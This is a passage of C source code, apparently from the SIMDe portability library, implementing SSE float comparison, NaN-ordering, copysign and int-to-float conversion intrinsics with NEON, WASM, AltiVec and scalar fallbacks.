#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u32 = vcleq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_le(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmple(a_.altivec_f32, b_.altivec_f32));
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = HEDLEY_STATIC_CAST(__typeof__(r_.i32), (a_.f32 <= b_.f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (a_.f32[i] <= b_.f32[i]) ? ~UINT32_C(0)
: UINT32_C(0);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmple_ps(a, b) simde_mm_cmple_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmple_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmple_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmple_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.u32[0] = (a_.f32[0] <= b_.f32[0]) ? ~UINT32_C(0) : UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmple_ss(a, b) simde_mm_cmple_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmplt_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmplt_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u32 = vcltq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_lt(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmplt(a_.altivec_f32, b_.altivec_f32));
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = HEDLEY_STATIC_CAST(__typeof__(r_.i32), (a_.f32 < b_.f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (a_.f32[i] < b_.f32[i]) ? ~UINT32_C(0)
: UINT32_C(0);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmplt_ps(a, b) simde_mm_cmplt_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmplt_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmplt_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmplt_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.u32[0] = (a_.f32[0] < b_.f32[0]) ? ~UINT32_C(0) : UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmplt_ss(a, b) simde_mm_cmplt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpneq_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpneq_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u32 = vmvnq_u32(vceqq_f32(a_.neon_f32, b_.neon_f32));
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_ne(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P9_NATIVE) && SIMDE_ARCH_POWER_CHECK(900) && \
!defined(HEDLEY_IBM_VERSION)
/* vec_cmpne(SIMDE_POWER_ALTIVEC_VECTOR(float), SIMDE_POWER_ALTIVEC_VECTOR(float))
is missing from XL C/C++ v16.1.1,
though the documentation (table 89 on page 432 of the IBM XL C/C++ for
Linux Compiler Reference, Version 16.1.1) shows that it should be
present. Both GCC and clang support it. */
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmpne(a_.altivec_f32, b_.altivec_f32));
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmpeq(a_.altivec_f32, b_.altivec_f32));
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_nor(r_.altivec_f32, r_.altivec_f32));
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = HEDLEY_STATIC_CAST(__typeof__(r_.i32), (a_.f32 != b_.f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (a_.f32[i] != b_.f32[i]) ? ~UINT32_C(0)
: UINT32_C(0);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpneq_ps(a, b) simde_mm_cmpneq_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpneq_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpneq_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmpneq_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.u32[0] = (a_.f32[0] != b_.f32[0]) ? ~UINT32_C(0) : UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpneq_ss(a, b) simde_mm_cmpneq_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpnge_ps(simde__m128 a, simde__m128 b)
{
return simde_mm_cmplt_ps(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpnge_ps(a, b) simde_mm_cmpnge_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpnge_ss(simde__m128 a, simde__m128 b)
{
return simde_mm_cmplt_ss(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpnge_ss(a, b) simde_mm_cmpnge_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpngt_ps(simde__m128 a, simde__m128 b)
{
return simde_mm_cmple_ps(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpngt_ps(a, b) simde_mm_cmpngt_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpngt_ss(simde__m128 a, simde__m128 b)
{
return simde_mm_cmple_ss(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpngt_ss(a, b) simde_mm_cmpngt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpnle_ps(simde__m128 a, simde__m128 b)
{
return simde_mm_cmpgt_ps(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpnle_ps(a, b) simde_mm_cmpnle_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpnle_ss(simde__m128 a, simde__m128 b)
{
return simde_mm_cmpgt_ss(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpnle_ss(a, b) simde_mm_cmpnle_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpnlt_ps(simde__m128 a, simde__m128 b)
{
return simde_mm_cmpge_ps(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpnlt_ps(a, b) simde_mm_cmpnlt_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpnlt_ss(simde__m128 a, simde__m128 b)
{
return simde_mm_cmpge_ss(a, b);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpnlt_ss(a, b) simde_mm_cmpnlt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpord_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpord_ps(a, b);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
return wasm_v128_and(wasm_f32x4_eq(a, a), wasm_f32x4_eq(b, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
/* NEON has no ordered-compare builtin, so compare a == a and
b == b to detect NaN lanes, then AND the two results to get
the final ordered mask. */
uint32x4_t ceqaa = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t ceqbb = vceqq_f32(b_.neon_f32, b_.neon_f32);
r_.neon_u32 = vandq_u32(ceqaa, ceqbb);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_and(wasm_f32x4_eq(a_.wasm_v128, a_.wasm_v128),
wasm_f32x4_eq(b_.wasm_v128, b_.wasm_v128));
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_and(vec_cmpeq(a_.altivec_f32, a_.altivec_f32),
vec_cmpeq(b_.altivec_f32, b_.altivec_f32)));
#elif defined(simde_math_isnanf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (simde_math_isnanf(a_.f32[i]) ||
simde_math_isnanf(b_.f32[i]))
? UINT32_C(0)
: ~UINT32_C(0);
}
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpord_ps(a, b) simde_mm_cmpord_ps((a), (b))
#endif
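/* Worked example: for a lane pair (NaN, 1.0f) cmpord yields 0 (at least one
 * operand is NaN) while cmpunord below yields ~0; for (1.0f, 2.0f) the two
 * results are reversed. */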
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpunord_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpunord_ps(a, b);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
return wasm_v128_or(wasm_f32x4_ne(a, a), wasm_f32x4_ne(b, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t ceqaa = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t ceqbb = vceqq_f32(b_.neon_f32, b_.neon_f32);
r_.neon_u32 = vmvnq_u32(vandq_u32(ceqaa, ceqbb));
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_or(wasm_f32x4_ne(a_.wasm_v128, a_.wasm_v128),
wasm_f32x4_ne(b_.wasm_v128, b_.wasm_v128));
#elif defined(SIMDE_POWER_ALTIVEC_P8_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_nand(vec_cmpeq(a_.altivec_f32, a_.altivec_f32),
vec_cmpeq(b_.altivec_f32, b_.altivec_f32)));
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_and(vec_cmpeq(a_.altivec_f32, a_.altivec_f32),
vec_cmpeq(b_.altivec_f32, b_.altivec_f32)));
r_.altivec_f32 = vec_nor(r_.altivec_f32, r_.altivec_f32);
#elif defined(simde_math_isnanf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (simde_math_isnanf(a_.f32[i]) ||
simde_math_isnanf(b_.f32[i]))
? ~UINT32_C(0)
: UINT32_C(0);
}
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpunord_ps(a, b) simde_mm_cmpunord_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpunord_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && !defined(__PGI)
return _mm_cmpunord_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmpunord_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(simde_math_isnanf)
r_.u32[0] =
(simde_math_isnanf(a_.f32[0]) || simde_math_isnanf(b_.f32[0]))
? ~UINT32_C(0)
: UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.u32) / sizeof(r_.u32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpunord_ss(a, b) simde_mm_cmpunord_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_comieq_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_comieq_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_or_b_nan = vmvnq_u32(vandq_u32(a_not_nan, b_not_nan));
uint32x4_t a_eq_b = vceqq_f32(a_.neon_f32, b_.neon_f32);
return !!(vgetq_lane_u32(vorrq_u32(a_or_b_nan, a_eq_b), 0) != 0);
#else
return a_.f32[0] == b_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_comieq_ss(a, b) simde_mm_comieq_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_comige_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_comige_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_and_b_not_nan = vandq_u32(a_not_nan, b_not_nan);
uint32x4_t a_ge_b = vcgeq_f32(a_.neon_f32, b_.neon_f32);
return !!(vgetq_lane_u32(vandq_u32(a_and_b_not_nan, a_ge_b), 0) != 0);
#else
return a_.f32[0] >= b_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_comige_ss(a, b) simde_mm_comige_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_comigt_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_comigt_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_and_b_not_nan = vandq_u32(a_not_nan, b_not_nan);
uint32x4_t a_gt_b = vcgtq_f32(a_.neon_f32, b_.neon_f32);
return !!(vgetq_lane_u32(vandq_u32(a_and_b_not_nan, a_gt_b), 0) != 0);
#else
return a_.f32[0] > b_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_comigt_ss(a, b) simde_mm_comigt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_comile_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_comile_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_or_b_nan = vmvnq_u32(vandq_u32(a_not_nan, b_not_nan));
uint32x4_t a_le_b = vcleq_f32(a_.neon_f32, b_.neon_f32);
return !!(vgetq_lane_u32(vorrq_u32(a_or_b_nan, a_le_b), 0) != 0);
#else
return a_.f32[0] <= b_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_comile_ss(a, b) simde_mm_comile_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_comilt_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_comilt_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_or_b_nan = vmvnq_u32(vandq_u32(a_not_nan, b_not_nan));
uint32x4_t a_lt_b = vcltq_f32(a_.neon_f32, b_.neon_f32);
return !!(vgetq_lane_u32(vorrq_u32(a_or_b_nan, a_lt_b), 0) != 0);
#else
return a_.f32[0] < b_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_comilt_ss(a, b) simde_mm_comilt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_comineq_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_comineq_ss(a, b);
#else
simde__m128_private a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
uint32x4_t a_not_nan = vceqq_f32(a_.neon_f32, a_.neon_f32);
uint32x4_t b_not_nan = vceqq_f32(b_.neon_f32, b_.neon_f32);
uint32x4_t a_and_b_not_nan = vandq_u32(a_not_nan, b_not_nan);
uint32x4_t a_neq_b = vmvnq_u32(vceqq_f32(a_.neon_f32, b_.neon_f32));
return !!(vgetq_lane_u32(vandq_u32(a_and_b_not_nan, a_neq_b), 0) != 0);
#else
return a_.f32[0] != b_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_comineq_ss(a, b) simde_mm_comineq_ss((a), (b))
#endif
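/* Usage sketch (illustrative only): unlike the cmp* family, the comi*
 * functions compare just the lowest lane and return a plain int, so they
 * can drive ordinary control flow without extracting lanes by hand:
 *
 *     if (simde_mm_comilt_ss(x, limit)) {
 *         // lowest lane of x is below the lowest lane of limit
 *     }
 */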
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_copysign_ps(simde__m128 dest, simde__m128 src)
{
simde__m128_private r_, dest_ = simde__m128_to_private(dest),
src_ = simde__m128_to_private(src);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
const uint32x4_t sign_pos =
vreinterpretq_u32_f32(vdupq_n_f32(-SIMDE_FLOAT32_C(0.0)));
r_.neon_u32 = vbslq_u32(sign_pos, src_.neon_u32, dest_.neon_u32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
const v128_t sign_pos = wasm_f32x4_splat(-0.0f);
r_.wasm_v128 =
wasm_v128_bitselect(src_.wasm_v128, dest_.wasm_v128, sign_pos);
#elif defined(SIMDE_POWER_ALTIVEC_P9_NATIVE)
#if !defined(HEDLEY_IBM_VERSION)
r_.altivec_f32 = vec_cpsgn(dest_.altivec_f32, src_.altivec_f32);
#else
r_.altivec_f32 = vec_cpsgn(src_.altivec_f32, dest_.altivec_f32);
#endif
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
const SIMDE_POWER_ALTIVEC_VECTOR(unsigned int)
sign_pos = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(unsigned int),
vec_splats(-0.0f));
r_.altivec_f32 = vec_sel(dest_.altivec_f32, src_.altivec_f32, sign_pos);
#elif defined(SIMDE_IEEE754_STORAGE)
(void)src_;
(void)dest_;
simde__m128 sign_pos = simde_mm_set1_ps(-0.0f);
r_ = simde__m128_to_private(simde_mm_xor_ps(
dest, simde_mm_and_ps(simde_mm_xor_ps(dest, src), sign_pos)));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = simde_math_copysignf(dest_.f32[i], src_.f32[i]);
}
#endif
return simde__m128_from_private(r_);
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_xorsign_ps(simde__m128 dest, simde__m128 src)
{
return simde_mm_xor_ps(simde_mm_and_ps(simde_mm_set1_ps(-0.0f), src),
dest);
}
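/* Scalar sketch of the two bit tricks above (assumes IEEE-754 binary32
 * storage): copysign keeps dest's magnitude and takes src's sign bit,
 * while xorsign flips dest's sign wherever src is negative, i.e. it
 * applies the sign of src without a multiply:
 *
 *     uint32_t sign_bit = UINT32_C(0x80000000);
 *     copysign_bits = (dest_bits & ~sign_bit) | (src_bits & sign_bit);
 *     xorsign_bits  =  dest_bits ^ (src_bits & sign_bit);
 */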
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvt_pi2ps(simde__m128 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvt_pi2ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
simde__m64_private b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcombine_f32(vcvt_f32_s32(b_.neon_i32),
vget_high_f32(a_.neon_f32));
#elif defined(SIMDE_CONVERT_VECTOR_)
SIMDE_CONVERT_VECTOR_(r_.m64_private[0].f32, b_.i32);
r_.m64_private[1] = a_.m64_private[1];
#else
r_.f32[0] = (simde_float32)b_.i32[0];
r_.f32[1] = (simde_float32)b_.i32[1];
r_.i32[2] = a_.i32[2];
r_.i32[3] = a_.i32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvt_pi2ps(a, b) simde_mm_cvt_pi2ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_cvt_ps2pi(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvt_ps2pi(a);
#else
simde__m64_private r_;
simde__m128_private a_;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
a_ = simde__m128_to_private(
simde_mm_round_ps(a, SIMDE_MM_FROUND_CUR_DIRECTION));
r_.neon_i32 = vcvt_s32_f32(vget_low_f32(a_.neon_f32));
#elif defined(SIMDE_CONVERT_VECTOR_) && SIMDE_NATURAL_VECTOR_SIZE_GE(128)
a_ = simde__m128_to_private(
simde_mm_round_ps(a, SIMDE_MM_FROUND_CUR_DIRECTION));
SIMDE_CONVERT_VECTOR_(r_.i32, a_.m64_private[0].f32);
#else
a_ = simde__m128_to_private(a);
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i32) / sizeof(r_.i32[0])); i++) {
r_.i32[i] = HEDLEY_STATIC_CAST(
int32_t, simde_math_nearbyintf(a_.f32[i]));
}
#endif
return simde__m64_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvt_ps2pi(a) simde_mm_cvt_ps2pi((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvt_si2ss(simde__m128 a, int32_t b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cvt_si2ss(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 =
vsetq_lane_f32(HEDLEY_STATIC_CAST(float, b), a_.neon_f32, 0);
#else
r_.f32[0] = HEDLEY_STATIC_CAST(simde_float32, b);
r_.i32[1] = a_.i32[1];
r_.i32[2] = a_.i32[2];
r_.i32[3] = a_.i32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvt_si2ss(a, b) simde_mm_cvt_si2ss((a), b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
int32_t simde_mm_cvt_ss2si(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cvt_ss2si(a);
#elif defined(SIMDE_ARM_NEON_A32V8_NATIVE) && !defined(SIMDE_BUG_GCC_95399)
return vgetq_lane_s32(vcvtnq_s32_f32(simde__m128_to_neon_f32(a)), 0);
#else
simde__m128_private a_ = simde__m128_to_private(
simde_mm_round_ps(a, SIMDE_MM_FROUND_CUR_DIRECTION));
return SIMDE_CONVERT_FTOI(int32_t, a_.f32[0]);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvt_ss2si(a) simde_mm_cvt_ss2si((a))
#endif
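/* Usage sketch (illustrative only): this conversion rounds (to nearest
 * even in the default FP environment) rather than truncating, which is
 * what separates it from simde_mm_cvtt_ss2si below:
 *
 *     int32_t n = simde_mm_cvt_ss2si(simde_mm_set_ss(2.7f));   // 3
 *     int32_t t = simde_mm_cvtt_ss2si(simde_mm_set_ss(2.7f));  // 2
 */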
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtpi16_ps(simde__m64 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtpi16_ps(a);
#else
simde__m128_private r_;
simde__m64_private a_ = simde__m64_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcvtq_f32_s32(vmovl_s16(a_.neon_i16));
#elif defined(SIMDE_CONVERT_VECTOR_)
SIMDE_CONVERT_VECTOR_(r_.f32, a_.i16);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
simde_float32 v = a_.i16[i];
r_.f32[i] = v;
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtpi16_ps(a) simde_mm_cvtpi16_ps(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtpi32_ps(simde__m128 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtpi32_ps(a, b);
#else
